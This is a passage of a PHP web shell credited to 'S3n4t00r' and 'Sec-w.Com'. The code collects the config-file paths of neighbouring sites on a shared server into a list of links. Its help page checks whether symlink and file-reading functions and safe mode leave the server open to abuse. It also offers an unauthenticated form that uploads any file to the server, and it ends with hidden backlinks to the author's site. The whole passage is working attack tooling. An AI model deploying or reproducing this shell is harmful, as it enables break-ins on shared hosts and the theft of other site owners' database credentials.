1282. $pos = strpos($wp, "200");
1283. $config="&nbsp;";
1284.  
1285. if (strpos($wp, "200") == true )
1286. {
1287.  $config= $wpl;
1288. }
1289. elseif (strpos($wp12, "200") == true)
1290. {
1291.   $config= $wp2;
1292. }
1293. elseif (strpos($wp13, "200") == true)
1294. {
1295.   $config= $wp3;
1296. }
1297. else
1298. {
1299. continue;
1300.  
1301. }
1302. flush();
1303.  
1304. /////////////////////////////////////////////////////////////////////////////////////
1305.  
1306. $dom = $domsws[1][0];
1307.  
1308. $w = fwrite($f,"$config||$dom \n");
1309. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
1310.  
1311.  
1312. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
1313. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
1314.  
1315.  
1316.  
1317.  
1318.  
1319. flush();
1320.  
1321.  
1322. }
1323. }
1324. }
1325. }
1326.  
1327.  
1328.  
1329.  
1330.  
1331.  
1332.  
1333.  
1334. break;
1335.  
1336. case 'help':
1337.  
1338. echo "<div class='tmp'>
1339. <table align='center' width='40%'><td>function</td><td>Case</td>";
1340.  
1341.  
1342. $safe_mode = ini_get('safe_mode');
1343.      if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
1344.  
1345. echo "<tr><td>Safe Mode</td><td>$r</td>";
1346.  
1347. $fun = function_exists('symlink');
1348.      if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
1349.  
1350. echo "<tr><td>function symlink</td><td>$r</td>";
1351.  
1352.  
1353. $fun = function_exists('file');
1354.      if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
1355.  
1356. echo "<tr><td>function file</td><td>$r</td>";
1357.  
1358. $fun = function_exists('file_get_contents');
1359.      if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
1360.  
1361. echo "<tr><td>function file_get_contents</td><td>$r</td>";
1362.  
1363. $fun = function_exists('mkdir');
1364.      if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
1365.  
1366. echo "<tr><td>function mkdir</td><td>$r</td>";
1367.  
1368.  
1369. $fun = is_dir('sym/root');
1370.      if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
1371.  
1372. echo "<tr><td>Permission denied</td><td>$r</td>";
1373.  
1374.  
1375. $fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
1376.      if($fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}
1377.  
1378. echo "<tr><td>Forbidden</td><td>$r</td>";
1379.  
1380.  
1381.  
1382.  
1383. echo "</table></div>";
1384.  
1385.  
1386.  
1387. break;
1388. default:
1389. header("Location: $pg");
1390.  
1391.  
1392.  
1393.  
1394. }
1395.  
1396.  
1397. /// home ///
1398. }else
1399. {
1400.  
1401.  
1402. echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
1403. echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
1404. if( $_POST['_upl'] == "Upload" ) {
1405.     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
1406.     else { echo '<br /><br />Not uploaded !!<br><br>'; }
1407.  
1408.  
1409. }
1410.  
1411.     echo '
1412. <br /><br /><br /></b></b><div class="fot">Cod3d by <b>S3n4t00r</b> Idea by <b>Mr.Alsa3ek</b>
1413. <br /><br />
1414. <b style="color: red";>   Sec-w.Com  </b>
1415. <br /><br />
1416. Muslims Hackers</div> ';
1417.  
1418. }
1419.  
1420.  
1421. function ex($text,$a,$b){
1422. $explode = explode($a,$text);
1423. $explode = explode($b,$explode[1]);
1424. return $explode[0];
1425. }
1426.  
1427.  
1428.  
1429. echo '</div>
1430.  
1431. <a style="text-decoration: none; color: #F4F4F4;" title="???????"/href="http://sec-w.com/cc">???????</a>
1432.  
1433. <a style="text-decoration: none; color: #F4F4F4;" title="???? ???????"/href="http://sec-w.com/cc">???? ???????</a>
1434.  
1435.  
1436.  
1437. </body>
1438.  
1439. </html>
1440. ';
1441.  
1442. ?>